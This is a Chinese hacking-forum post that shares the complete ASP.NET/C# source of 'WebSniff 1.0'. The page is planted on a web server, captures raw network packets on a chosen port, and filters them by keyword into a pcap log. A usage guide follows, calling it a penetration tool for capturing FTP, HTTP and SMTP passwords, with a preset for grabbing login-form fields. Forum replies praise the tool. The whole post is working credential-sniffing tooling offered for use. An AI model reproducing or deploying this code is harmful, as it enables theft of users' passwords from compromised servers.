Websniff 1.0

ilx

1. <%@ Page Language="C#" ValidateRequest="false" %>
   
2. <%@ Import Namespace="System.Net.Sockets" %>
   
3. <%@ Import Namespace="System.Net" %>
   
4. <%@ Import Namespace="System.IO" %>
   
5. <%@ Import Namespace="System.Collections" %>
   
6. <%@ Import Namespace="System.Text" %>
   
7. <%@ Import Namespace="System.Net.NetworkInformation" %>
   
8. <%@ Import Namespace="System.Threading" %>
   
9. <%@ Import Namespace="System.Threading" %>
   
10. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    
11. <html xmlns="http://www.w3.org/1999/xhtml">
    
12. <head runat="server">
    
13.     <title>WebSniff 1.0</title>
    
14. </head>
    
15. <body>
    
16. 
    
17.     <script runat="server">
    
18.    
    
19.         static private Socket mainSocket;                          //The socket which captures all incoming packets
    
20.         private static byte[] byteData = new byte[2048];
    
21.         private static bool bContinueCapturing = true;            //A flag to check if packets are to be captured or not
    
22.         static int stoppackes = 0;
    
23.         static int port = 25;
    
24.         static string strIP = null;
    
25.         static long packets = 0;
    
26.         static System.IO.FileStream wfs;
    
27.         string logfile;
    
28.         static PacketCaptureWriter pktwt;
    
29.         static string keyword;
    
30.         static DateTime stoptime;
    
31.         Thread th;
    
32.         static int minisizepacket=0;
    
33.         protected void Page_Load(object sender, EventArgs e)
    
34.         {
    
35.             Session.Timeout = 43200;
    
36.          
    
37.             if (!IsPostBack)
    
38.             {
    
39.                 txtlogfile.Text = Server.MapPath("w"+System.DateTime.Now.ToFileTime()+".rar");
    
40.                 txtpackets.Text = System.DateTime.Now.ToString();
    
41.                 IPHostEntry HosyEntry = Dns.GetHostEntry((Dns.GetHostName()));
    
42.                 if (HosyEntry.AddressList.Length > 0)
    
43.                 {
    
44.                     foreach (IPAddress ip in HosyEntry.AddressList)
    
45.                     {
    
46.                         ddlist.Items.Add(ip.ToString());
    
47.                     }
    
48.                 }
    
49.             }
    
50.             th = (Thread)Session["workthread"];
    
51.             if (th != null)
    
52.             {
    
53.                 this.Lb_msg.Text = System.DateTime.Now.ToString()+"  TreadsState: " + th.ThreadState.ToString() +"  Packets: "+packets.ToString();
    
54.             }
    
55.             else
    
56.             {
    
57.                 this.Lb_msg.Text = "Treads Null";
    
58.             }
    
59.         }
    
60. 
    
61.         protected void Refresh_Click(object sender, EventArgs e)
    
62.         {
    
63. 
    
64.         }
    
65. 
    
66.         protected void Stop_Click(object sender, EventArgs e)
    
67.         {
    
68.             packets = stoppackes;
    
69.             stoptime = System.DateTime.Now;
    
70.             bContinueCapturing = false;
    
71.          
    
72.             wfs.Close();
    
73.             if (th != null)
    
74.             {
    
75.                 th.Abort();
    
76.             }
    
77.             Session.RemoveAll();
    
78.         }
    
79.         protected void Pagestart()
    
80.         {
    
81.             strIP = ddlist.SelectedValue;
    
82.             port = Int32.Parse(txtport.Text);
    
83.             stoptime = Convert.ToDateTime( txtpackets.Text);
    
84.             logfile = this.txtlogfile.Text;
    
85.             wfs = System.IO.File.Create(logfile);
    
86. 
    
87.             pktwt = new PacketCaptureWriter(wfs, LinkLayerType.RawIP);
    
88.             keyword = txtkeywords.Text;
    
89.             minisizepacket= Int32.Parse(txtMinisize.Text);
    
90.             bContinueCapturing = true;
    
91.             packets = 0;
    
92.             
    
93.             Start();
    
94.         }
    
95.         private static void Start()
    
96.         {
    
97.             bContinueCapturing = true;
    
98.             mainSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP);
    
99.             mainSocket.Bind(new IPEndPoint(IPAddress.Parse(strIP), 0));
    
100.             mainSocket.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, true);
     
101.             byte[] byTrue = new byte[4] { 1, 0, 0, 0 };
     
102.             byte[] byOut = new byte[4] { 1, 0, 0, 0 };
     
103.             mainSocket.IOControl(IOControlCode.ReceiveAll, byTrue, byOut);
     
104.             byteData = new byte[2048];
     
105.             while (System.DateTime.Now <= stoptime)
     
106.             {
     
107.                 int size = mainSocket.Receive(byteData);
     
108.                 ParseData(byteData, size);
     
109.             }
     
110.             bContinueCapturing = false;
     
111.             wfs.Close();
     
112.             mainSocket.Close();
     
113.         }
     
114.      
     
115.         protected void Start_Click(object sender, EventArgs e)
     
116.         {
     
117. 
     
118.             if (this.txtlogfile.Text == "" || txtpackets.Text.Length < 1 || txtport.Text == "") return;
     
119.             th = new Thread(new ThreadStart(Pagestart));
     
120.             th.Start();
     
121.             Session["workthread"] = th;
     
122.             this.Lb_msg.Text = "\r\nStart One Thread...";
     
123.         }
     
124. 
     
125.         public static ushort Get2Bytes(byte[] ptr, int Index, int Type)
     
126.         {
     
127.             ushort u = 0;
     
128. 
     
129.             if (Type == 0)
     
130.             {
     
131.                 u = (ushort)ptr[Index++];
     
132.                 u *= 256;
     
133.                 u += (ushort)ptr[Index++];
     
134.             }
     
135.             else if (Type == 1)
     
136.             {
     
137.                 u = (ushort)ptr[++Index];
     
138.                 u *= 256; Index--;
     
139.                 u += (ushort)ptr[Index++]; Index++;
     
140.             }
     
141. 
     
142.             return u;
     
143.         }
     
144. 
     
145. 
     
146.         private static void ParseData(byte[] byteData, int nReceived)
     
147.         {
     
148.             try
     
149.             {
     
150.                 byte[] nbyte = new byte[nReceived];
     
151.                 Array.Copy(byteData, nbyte, nReceived);
     
152. 
     
153. 
     
154.                 int ptype = (int)nbyte[9];
     
155. 
     
156.                 if (ptype == 6)
     
157.                 {
     
158.                   
     
159.                     int sport = Get2Bytes(nbyte,  20,0);
     
160.                     int dport = Get2Bytes(nbyte,  22,0);
     
161.                     if (dport == port || sport == port)
     
162.                     {
     
163.                         if (nReceived > minisizepacket)
     
164.                         {
     
165. 
     
166.                             if (keyword != "")
     
167.                             {
     
168.                                 if (Encoding.Default.GetString(nbyte).IndexOf(keyword) > 0)
     
169.                                 {
     
170.                                     PacketCapture pkt = new PacketCapture(nbyte, nReceived);
     
171.                                     pktwt.Write(pkt);
     
172.                                    
     
173.                                     packets++;
     
174.                                 }
     
175. 
     
176.                             }
     
177.                             else
     
178.                             {
     
179.                                 PacketCapture pkt = new PacketCapture(nbyte, nReceived);
     
180.                                 pktwt.Write(pkt);
     
181.                               
     
182.                                 packets++;
     
183.                             }
     
184. 
     
185.                         }
     
186.                     }
     
187.                 }
     
188.             }
     
189.             catch { }
     
190. 
     
191.         }
     
192.         public struct UnixTime
     
193.         {
     
194.             public static readonly DateTime MinDateTime = new DateTime(1970, 1, 1, 0, 0, 0);
     
195.             public static readonly DateTime MaxDateTime = new DateTime(2038, 1, 19, 3, 14, 7);
     
196. 
     
197.             private readonly int _Value;
     
198. 
     
199.             public UnixTime(int value)
     
200.             {
     
201.                 if (value < 0)
     
202.                     throw new ArgumentOutOfRangeException("value");
     
203.                 _Value = value;
     
204.             }
     
205. 
     
206.             public int Value
     
207.             {
     
208.                 get { return _Value; }
     
209.             }
     
210. 
     
211.             public DateTime ToDateTime()
     
212.             {
     
213.                 const long START = 621355968000000000; // 1970-1-1 00:00:00
     
214.                 return new DateTime(START + (_Value * (long)10000000)).ToLocalTime();
     
215.             }
     
216. 
     
217.             public static UnixTime FromDateTime(DateTime dateTime)
     
218.             {
     
219.                 if (dateTime < MinDateTime || dateTime > MaxDateTime)
     
220.                     throw new ArgumentOutOfRangeException("dateTime");
     
221.                 TimeSpan span = dateTime.Subtract(MinDateTime);
     
222.                 return new UnixTime((int)span.TotalSeconds);
     
223.             }
     
224. 
     
225.             public override string ToString()
     
226.             {
     
227.                 return ToDateTime().ToString();
     
228.             }
     
229. 
     
230.         }
     
231.         public enum LinkLayerType : uint
     
232.         {
     
233.             Null = 0,
     
234.             Ethernet = 1,
     
235.             RawIP = 101,
     
236.             User0 = 147,
     
237.             User1 = 148,
     
238.             User2 = 149,
     
239.             User3 = 150,
     
240.             User4 = 151,
     
241.             User5 = 152,
     
242.             User6 = 153,
     
243.             User7 = 154,
     
244.             User8 = 155,
     
245.             User9 = 156,
     
246.             User10 = 157,
     
247.             User11 = 158,
     
248.             User12 = 159,
     
249.             User13 = 160,
     
250.             User14 = 161,
     
251.             User15 = 162,
     
252. 
     
253.         }
     
254. 
     
255. 
     
256.         public sealed class PacketCaptureWriter
     
257.         {
     
258.             #region Fields
     
259.             private const uint MAGIC = 0xA1B2C3D4;
     
260.             private readonly Stream _BaseStream;
     
261.             private readonly LinkLayerType _LinkLayerType;
     
262.             private readonly int _MaxPacketLength;
     
263.             private readonly BinaryWriter m_Writer;
     
264.             private bool m_ExistHeader = false;
     
265.             private int _TimeZone;
     
266.             private int _CaptureTimestamp;
     
267. 
     
268.             #endregion
     
269. 
     
270.             #region Constructors
     
271. 
     
272.             public PacketCaptureWriter(
     
273.                 Stream baseStream, LinkLayerType linkLayerType,
     
274.                 int maxPacketLength, int captureTimestamp)
     
275.             {
     
276.                 if (baseStream == null) throw new ArgumentNullException("baseStream");
     
277.                 if (maxPacketLength < 0) throw new ArgumentOutOfRangeException("maxPacketLength");
     
278.                 if (!baseStream.CanWrite) throw new ArgumentException("Cant'Wirte Stream");
     
279.                 _BaseStream = baseStream;
     
280.                 _LinkLayerType = linkLayerType;
     
281.                 _MaxPacketLength = maxPacketLength;
     
282.                 _CaptureTimestamp = captureTimestamp;
     
283.                 m_Writer = new BinaryWriter(_BaseStream);
     
284.             }
     
285. 
     
286. 
     
287.             public PacketCaptureWriter(Stream baseStream, LinkLayerType linkLayerType, int captureTimestamp)
     
288.                 : this(baseStream, linkLayerType, 0xFFFF, captureTimestamp)
     
289.             {
     
290.             }
     
291. 
     
292.             public PacketCaptureWriter(Stream baseStream, LinkLayerType linkLayerType)
     
293.                 : this(baseStream, linkLayerType, 0xFFFF, UnixTime.FromDateTime(DateTime.Now).Value)
     
294.             {
     
295.             }
     
296. 
     
297.             #endregion
     
298. 
     
299.             #region Properties
     
300. 
     
301.             public short VersionMajor
     
302.             {
     
303.                 get { return 2; }
     
304.             }
     
305. 
     
306.             public short VersionMinjor
     
307.             {
     
308.                 get { return 4; }
     
309.             }
     
310. 
     
311. 
     
312.             public int TimeZone
     
313.             {
     
314.                 get { return _TimeZone; }
     
315.                 set { _TimeZone = value; }
     
316.             }
     
317. 
     
318.   
     
319.             public int CaptureTimestamp
     
320.             {
     
321.                 get { return _CaptureTimestamp; }
     
322.                 set { _CaptureTimestamp = value; }
     
323.             }
     
324. 
     
325. 
     
326.             public Stream BaseStream
     
327.             {
     
328.                 get { return _BaseStream; }
     
329.             }
     
330. 
     
331.             public LinkLayerType LinkLaterType
     
332.             {
     
333.                 get { return _LinkLayerType; }
     
334.             }
     
335. 
     
336.             public int MaxPacketLength
     
337.             {
     
338.                 get { return _MaxPacketLength; }
     
339.             }
     
340. 
     
341.             #endregion
     
342. 
     
343. 
     
344.             public void Write(PacketCapture packet)
     
345.             {
     
346.                 CheckHeader();
     
347.                 m_Writer.Write(packet.Timestamp.Value);
     
348.                 m_Writer.Write(packet.Millseconds);
     
349.                 m_Writer.Write(packet.Packet.Count);
     
350.                 m_Writer.Write(packet.RawLength);
     
351.                 m_Writer.Write(packet.Packet.Array, packet.Packet.Offset, packet.Packet.Count);
     
352.             }
     
353. 
     
354. 
     
355.             public void Flush()
     
356.             {
     
357.                 BaseStream.Flush();
     
358.             }
     
359. 
     
360.             private void CheckHeader()
     
361.             {
     
362.                 if (!m_ExistHeader)
     
363.                 {
     
364.                     m_Writer.Write(MAGIC);
     
365.                     m_Writer.Write(VersionMajor);
     
366.                     m_Writer.Write(VersionMinjor);
     
367.                     m_Writer.Write(TimeZone);
     
368.                     m_Writer.Write(CaptureTimestamp);
     
369.                     m_Writer.Write(MaxPacketLength);
     
370.                     m_Writer.Write((uint)LinkLaterType);
     
371.                     m_ExistHeader = true;
     
372.                 }
     
373.             }
     
374. 
     
375.         }
     
376. 
     
377.         public sealed class PacketCapture
     
378.         {
     
379.             private readonly UnixTime _Timestamp;
     
380.             private readonly ArraySegment<byte> _Packet;
     
381.             private readonly int _RawLength;
     
382.             private readonly int _Millseconds;
     
383. 
     
384.       
     
385.             public PacketCapture(ArraySegment<byte> packet, int rawLength, UnixTime timestamp, int millseconds)
     
386.             {
     
387.                 if (packet.Count > rawLength)
     
388.                     throw new ArgumentException("Length Error", "rawLength");
     
389.                 _Packet = packet;
     
390.                 _Timestamp = timestamp;
     
391.                 _RawLength = rawLength;
     
392.                 _Millseconds = millseconds;
     
393.             }
     
394. 
     
395.             public PacketCapture(ArraySegment<byte> packet, int rawLength, DateTime timestamp)
     
396.                 : this(packet, rawLength, UnixTime.FromDateTime(timestamp), 0)
     
397.             {
     
398.             }
     
399. 
     
400.             public PacketCapture(ArraySegment<byte> packet, int rawLength)
     
401.                 : this(packet, rawLength, UnixTime.FromDateTime(DateTime.Today), 0)
     
402.             {
     
403.             }
     
404. 
     
405.             public PacketCapture(ArraySegment<byte> packet)
     
406.                 : this(packet, packet.Count)
     
407.             {
     
408.             }
     
409.             public PacketCapture(byte[] packetData, int offset, int count, int rawLength, UnixTime timestamp, int millseconds)
     
410.                 : this(new ArraySegment<byte>(packetData, offset, count), rawLength, timestamp, millseconds)
     
411.             {
     
412.             }
     
413.             public PacketCapture(byte[] packetData, int offset, int count, int rawLength, DateTime timestamp)
     
414.                 : this(new ArraySegment<byte>(packetData, offset, count), rawLength, UnixTime.FromDateTime(timestamp), 0)
     
415.             {
     
416.             }
     
417.             public PacketCapture(byte[] packetData, int rawLength, UnixTime timestamp, int millseconds)
     
418.                 : this(new ArraySegment<byte>(packetData), rawLength, timestamp, millseconds)
     
419.             {
     
420.             }
     
421.             public PacketCapture(byte[] packetData, int rawLength, DateTime timestamp)
     
422.                 : this(new ArraySegment<byte>(packetData), rawLength, UnixTime.FromDateTime(timestamp), 0)
     
423.             {
     
424.             }
     
425. 
     
426.             public PacketCapture(byte[] packetData, int rawLength)
     
427.                 : this(new ArraySegment<byte>(packetData), rawLength, UnixTime.FromDateTime(DateTime.Today), 0)
     
428.             {
     
429.             }
     
430.             public PacketCapture(byte[] packetData)
     
431.                 : this(packetData, packetData.Length)
     
432.             {
     
433.             }
     
434. 
     
435.             public ArraySegment<byte> Packet
     
436.             {
     
437.                 get { return _Packet; }
     
438.             }
     
439.             public UnixTime Timestamp
     
440.             {
     
441.                 get { return _Timestamp; }
     
442.             }
     
443.             public int Millseconds
     
444.             {
     
445.                 get { return _Millseconds; }
     
446.             }
     
447. 
     
448.             public int RawLength
     
449.             {
     
450.                 get { return _RawLength; }
     
451.             }
     
452. 
     
453.         }
     
454.     </script>
     
455. 
     
456. 
     
457. 
     
458. <style type="text/css">
     
459. <!--
     
460. a {
     
461.         color: #FF0000         ;text-decoration: none
     
462. }
     
463. #b
     
464. {
     
465. color: #336699;
     
466. font-size: 10pt;
     
467. text-align: right;
     
468. }
     
469. #tt
     
470. {
     
471. vertical-align: middle;
     
472. font-size: 12pt;
     
473. text-align: center;
     
474. }
     
475. 
     
476. #Ct_2
     
477. {
     
478. padding-left:30px;
     
479. font-size: 10pt;
     
480. color: #336699;
     
481. vertical-align: middle;
     
482. text-align: left;
     
483. background-color: aliceblue;
     
484. border-width: 1px;
     
485. border-style: solid;
     
486. border-color: -moz-use-text-color;
     
487. padding-bottom:10px;
     
488. }
     
489. -->
     
490. </style>
     
491.     <form id="form1" runat="server">
     
492.         <div id="tt">  <b> WebSniff 1.0</b><br><br>  </div>
     
493.     <div id="Ct_2" >
     
494.         <table width="100%" >
     
495.           <tr >
     
496.                 <td  width="10%"> BindIP: </td>
     
497.                 <td ><asp:DropDownList ID="ddlist" runat="server" width=90%></asp:DropDownList></td>
     
498.             </tr>
     
499.             <tr>
     
500.                 <td ">
     
501.                     FilterPort:
     
502.                 </td>
     
503.                 <td>
     
504.                     <asp:TextBox ID="txtport" Text="80"  width=90% runat="server"></asp:TextBox>
     
505.                 </td>
     
506.             </tr>
     
507.             <tr>
     
508.                 <td >
     
509.                     MiniSizeToCapture:
     
510.                 </td>
     
511.                 <td >
     
512.                     <asp:TextBox ID="txtMinisize" Text="0"  width=90% runat="server" ></asp:TextBox>
     
513.                 </td>
     
514.             </tr>
     
515.             <tr>
     
516.                 <td>
     
517.                     KeyWordsFilter:
     
518.                 </td>
     
519.                 <td>
     
520.                     <asp:TextBox ID="txtkeywords" runat="server"   width=90% Text=""></asp:TextBox>
     
521.                 </td>
     
522.             </tr>
     
523.             <tr>
     
524.                 <td >
     
525.                     LogFile:
     
526.                 </td>
     
527.                 <td>
     
528.                     <asp:TextBox ID="txtlogfile" runat="server"   width=90% Text="log.log" ></asp:TextBox>
     
529.                 </td>
     
530.             </tr>
     
531.             <tr>
     
532.                 <td >
     
533.                     Stop At Time
     
534.                 </td>
     
535.                 <td>
     
536.                     <asp:TextBox ID="txtpackets" runat="server"  width=90% Text="300"></asp:TextBox>
     
537.                 </td>
     
538.             </tr>
     
539.                          <tr>
     
540.                 <td >
     
541.                               Control:
     
542.                 </td>
     
543.                 <td   width=90% >         <asp:Button ID="Starts" runat="server" OnClick="Start_Click" Text="Start" />
     
544.                                           <asp:Button ID="Button1" runat="server" OnClick="Stop_Click" Text="Stop" />
     
545.                       <asp:Button ID="Button_ref" runat="server" OnClick="Refresh_Click" Text="Refresh" /><br />
     
546.                 </td>
     
547.             </tr>
     
548.                          <tr>
     
549.                 <td  >
     
550.                               Status:
     
551.                 </td>
     
552.                 <td   width=90%><div id="s"><asp:Label ID="Lb_msg" runat="server" Text=""></div></asp:Label>
     
553.                 </td>
     
554.             </tr>
     
555.         </table>
     
556.         </div><br><br>
     
557.                 <div id=b>Powered by <a href="//www.cncert.net"> C.C.T </a>|Version 1.0
     
558.                 </div>
     
559.     </form>
     
560. </body>
     
561. </html>
     

复制代码

-------------------------------------------------
图片是外链的。。。


Websniff 1.0 是user权限的 rawsocket sniff，可以截取ftp,http,smtp ...等密码，在渗透过程中绝对实用的工具。cncert网站发布的websniff需要 .net 2.0，客户端用firefox，如果用IE会让你错过一个参数设置。

先看下截图


bindip: 有多个IP的情况下，选择要监听的IP地址。只有一个IP，就不用选了。
filterport: 要监听的端口，只能同时监听一个，该参数匹配源地址或目的地址。
MiniSizeToCapture: 要捕获的数据包大小最小长度，例：设为40 那么只抓长度大于40的数据包。
KeyWordsFilter:要包含的关键字，例：设为"passwd " 在符合上面条件的数据包进一步过滤包含"passwd"的数据包，1.0版本不支持多关键字。
Logfile:捕获的数据包文件存放位置，必须为一个可写目录。
StopAttime:定时停止，格式为给出的格式，必须设置这个参数。

按钮功能 ：
启动 启动当前任务，不要重复启动。
停止 停止当前任务。
刷新状态 可以查看当前抓到的数据包数和任务终止时间。

注意：欲下载数据包文件前必须停止，或等待任务终止。最好不要关闭当前页，以便控制本次任务状态。

常用设置方案：
1.FTP 如上图
2.HTTP 表单记录
bindip=IP地址
filterport: 80
MiniSizeToCapture: 0
KeyWordsFilter:user=
Logfile:捕获的数据包文件存放位置，必须为一个可写目录。
StopAttime:定时停止，格式为给出的格式，必须设置这个参数。

停止任务后将数据包文件下载到本地，使用wireshark或记事本查看内容。

关于抓取到的内容：
在有些情况下只能抓取到下行数据，即向服务器提交的数据，对记录FTP,HTTP表单,SMTP 这已足够。

N.O

很详细，我就喜欢这样发贴的大牛

tianyueabc

顶起！！！！！！！

Free_小东

传说中的嗅探脚本

k红颜

顶起

longkubing

{:soso_e141:}好东西。。。

visiter

好厉害，虽然我看不懂代码